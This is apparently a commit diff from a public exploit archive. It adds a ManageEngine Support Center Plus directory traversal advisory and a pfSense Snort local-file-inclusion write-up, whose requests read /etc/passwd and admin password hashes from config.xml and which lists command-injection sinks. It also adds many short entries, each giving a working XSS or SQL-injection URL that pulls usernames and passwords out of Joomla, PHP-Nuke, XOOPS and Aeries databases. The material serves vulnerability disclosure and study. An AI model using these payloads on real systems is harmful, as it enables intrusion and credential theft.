Author:
-----------
xistence < xistence[at]0x90[.]nl >
-------------------------
Affected products:
-------------------------
ManageEngine Support Center Plus 7916 and lower
-------------------------
Affected vendors:
-------------------------
ManageEngine
http://www.manageengine.com/
-------------------------
Product description:
-------------------------
SupportCenter Plus is a web-based customer support software that lets
organizations effectively manage customer tickets,
their account & contact information, the service contracts and in the
process providing a superior customer experience.
----------
Details:
----------
[ 0x01 - Directory Traversal ]
Support Center Plus 7916 and lower is prone to a directory traversal
vulnerability. When creating a ticket and attaching
a file, this can be tampered to link to a local file on the server side.
By downloading the attachment from the ticket, the server file is
downloaded with the same privileges as the
Support Center Plus instance, which on windows is SYSTEM. On linux Support
Center Plus is mostly installed as the root user.
POST parameters when submitting a ticket to the /WorkOrder.do url and
attaching the server /etc/passwd:
category=&MOD_IND=WorkOrder&attachments=passwd&subCategory=0&addWO=addWO&title=pwned&attPath=
&component=Request&reqTemplate=&reqName=Guest&priority=2&item=0&reqID=2&attSize=31337&autoCCList=
&FORMNAME=WorkOrderForm&usertypename=Requester
&attach=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&prodId=0&description=pwned
-----------
Solution:
-----------
Upgrade to a build higher than 7916.
--------------
Timeline:
--------------
Fixed somewhere back in 2013 :)

223
platforms/php/webapps/31263.txt Executable file
View file

@ -0,0 +1,223 @@
######################################################################
# _ ___ _ _ ____ ____ _ _____
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
# | | | | | | \| | | _| | / _ \ | |
# | |__| |_| | |\ | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/ \_\_|
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI) & Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#####################################################################
pfSense firewall/router distribution description :
======================================================================
pfSense is a free, open source customized distribution of FreeBSD tailored
for use as a firewall and router. In addition to being a powerful, flexible
firewalling and routing platform, it includes a long list of related
features and a package system allowing further expandability without adding
bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its
inception, and proven in countless installations ranging from small home
networks protecting a PC and an Xbox to large corporations, universities
and other organizations protecting thousands of network devices.
This project started in 2004 as a fork of the m0n0wall project, but focused
towards full PC installations rather than the embedded hardware focus of
m0n0wall. pfSense also offers an embedded image for Compact Flash based
installations, however it is not our primary focus.
Attack Scenario
======================================================================
Authenticated users with only permission to access some packages in web gui
(a.k.a. webConfigurator) will be able to escalate themselves to other
privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
LFI), result in fully compromise the pfSense.
This attack abuse the user privilege scheme with some of official packages
(System > Package Manager)
* Session Hijacking also possible to steal less privileged user sessions to
perform this trick due to "http" admin by default webConfigurator.
Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
Vulnerability
Vulnerable file:
======================================================================
snort_log_view.php
[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14
Vulnerable Source Code :
======================================================================
http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php
…(deducted)...
$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?
if (file_exists($_GET['logfile']))
$contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
$contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
found!");
$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>
…(deducted)...
<textarea style="width:100%; height:100%;" readonly wrap="off" rows="33"
cols="80" name="code2"><?=$contents;?>&lt;/textarea&gt;
…(deducted)...
Proof of Concept 1 : Arbitrary File Inclusion
======================================================================
GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=180000
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32
…(deducted)...
<td colspan="2" valign="top" class="label">
<div style="background: #eeeeee; width:100%; height:100%;"
id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag
must be on the same line. -->
<textarea style="width:100%; height:100%;" readonly wrap="off"
rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
…(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
…(deducted)...
Proof of Concept 2 : Directory Traversal
# This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) +
Lighttpd/1.4.32 on FreeBSD 8.3 x64
======================================================================
GET /snort/snort_log_view.php?logfile=../ HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
…(deducted)...
¬p.Z..­p firewall_rules_edit.php®p
xmlrpc.php¯p
wizard.php°p
vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p
vpn_pppoe.phpµp vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p
vpn_openvpn_client.php¸p
vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php»p
vpn_ipsec_phase2.php¼p vpn_ipsec_phase1.php½p(vpn_ipsec_mobile.php¾p
vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp
vpn_ipsec.phpÁpuploadconfig.phpÂptreeview.cssÃpwizardsÏp
tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,!
…(deducted)...
Proof of Concept 3 : Privilege Escalation
# -rw-r--r-- root wheel 30k Jan 25 11:35 config.xml
======================================================================
GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
…(deducted)...
<group>
<name>office</name>
<description><![CDATA[Main Office Employees]]></description>
<member>2000</member>
<gid>2000</gid>
</group>
<user>
<name>admin</name>
<descr><![CDATA[System Administrator]]></descr>
<scope>system</scope>
<groupname>admins</groupname>
<password>$1$y8KiO3ow$mmMX4R0hE…(deducted)...</password>
<uid>0</uid>
<priv>user-shell-access</priv>
<md5-hash>d4383b6f4c9fa…(deducted)...</md5-hash>
<nt-hash>356239666432306265376131653…(deducted)...</nt-hash>
</user>
…(deducted)...
P.S. There are many other ways to escalate from less-privileged users using
official packages.
For example, some OS command injections (Feel free to dig deeper than me..
LoL)
arping/arping.inc:38: system("arping -c3 " . $_POST['hostip']);
tinc/tinc.inc:173: mwexec("/sbin/ifconfig
{$realif} -group " . $a_ifgroups[$_GET['id']]['ifname']);
spamd/spamd_db_ext.php:57:exec("echo {$_GET['action']} > /tmp/tmp");
spamd/spamd_db.php:106: $status = exec("/usr/local/sbin/spamdb | grep
\"{$_GET['getstatus']}\"");
freeswitch_dev/v_profiles.tmp:38: exec("cp
".$v_conf_dir.".orig/sip_profiles/".$_GET['f']."
".$v_conf_dir."/sip_profiles/".$_GET['f']);
freeswitch_dev/v_profiles.tmp:60: exec("rm
".$v_conf_dir."/sip_profiles/".$_GET['f']);
snort-dev/snortsam-package-code/snort_new.inc:112:
exec("/bin/ln -s
/usr/local/etc/snort/snortDBrules/DB/{$_POST['ruledbname']}/rules
{$pathToSnortDir}/{$newSnortDir}/rules");
snort-dev/snortsam-package-code/snort_new.inc:129:
$sidLinePosPre = exec('/usr/bin/sed -n /sid:' . $_POST['snortSidNum'] .
'\;/= ' . $workingFile);
# Special Thanks : Xelenonz, pistachio, pe3z and 2600 Thailand.
# Video PoC (Thai version) : https://www.youtube.com/watch?v=dGwOUccGZnE

9
platforms/php/webapps/31265.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27898/info
Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
The issues affect Spyce 2.1.3; other versions may also be vulnerable.
http://www.example.com/docs/examples/redirect.spy?url=%3CSCRIPT%3Ealert('Can%20Cross%20Site%20Attack')%3C/SCRIPT%3E&type=internal

9
platforms/php/webapps/31266.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27898/info
Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
The issues affect Spyce 2.1.3; other versions may also be vulnerable.
http://www.example.com/docs/examples/handlervalidate.spy?x="><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>

9
platforms/php/webapps/31267.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27898/info
Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
The issues affect Spyce 2.1.3; other versions may also be vulnerable.
http://www.example.com/spyce/examples/request.spy?name="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>

9
platforms/php/webapps/31268.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27898/info
Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
The issues affect Spyce 2.1.3; other versions may also be vulnerable.
http://www.example.com/spyce/examples/getpost.spy?Name="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>

10
platforms/php/webapps/31269.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/27898/info
Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
The issues affect Spyce 2.1.3; other versions may also be vulnerable.
http://www.example.com/spyce/examples/formtag.spy?="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>&foo=Submit!&mycheck=check1&mypass=secret&myradio=radio_option1&mytext=some&mytextarea=&lt;/textarea&gt;<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
http://www.example.com/spyce/examples/formtag.spy?mypass=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E

10
platforms/php/webapps/31270.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/27898/info
Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
The issues affect Spyce 2.1.3; other versions may also be vulnerable.
Requesting the following URL returns the server's webroot:
http://www.example.com/spyce/examples/automaton.spy

7
platforms/php/webapps/31272.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27921/info
The Joomla! and Mambo 'com_joomlavvz' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/*

7
platforms/php/webapps/31273.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27922/info
The Joomla! and Mambo 'com_most' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/*

7
platforms/php/webapps/31274.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27923/info
The Joomla! and Mambo 'com_asortyment' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999/**/union/**/select/**/0x3a,concat(username,0x3a,password),concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/*

9
platforms/php/webapps/31277.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27924/info
Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected.
http://www.example.com/ClassList.asp&Term=SQL

9
platforms/php/webapps/31278.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27924/info
Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected.
http://www.example.com/GradebookStuScores.asp?GrdBk=SQL

8
platforms/php/webapps/31280.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/27926/info
The Joomla! and Mambo Referenzen component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(user
name,0x3a,password),0,0,0,0,0/**/from/**/jos_users/*

7
platforms/php/webapps/31281.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27930/info
The Classifieds module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=Classifieds&mode=Details&id=-0000/**/union+select/**/000,111,222,000,aid,5,6,pwd,8,9,10,11/**/from/**/nuke_authors/*where%20admin%202%20-4

9
platforms/php/webapps/31282.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27931/info
Tiny Event is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects Tiny Event 1.01; other versions may also be vulnerable.
http://www.example.com/modules/tinyevent/index.php?op=print&id=-0/**/union/**/select+0x3a,0x3a,0x3a,uname,pass+from/**/xoops_users/*where%20admin%201%200%2066

9
platforms/php/webapps/31283.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27932/info
The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202
http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202

7
platforms/php/webapps/31284.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27934/info
XOOPS 'prayerlist' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules/prayerlist/index.php?pa=view&cid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass)/**/from/**/xoops_users/*

9
platforms/php/webapps/31287.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27955/info
The Recipe module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Recipe 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/*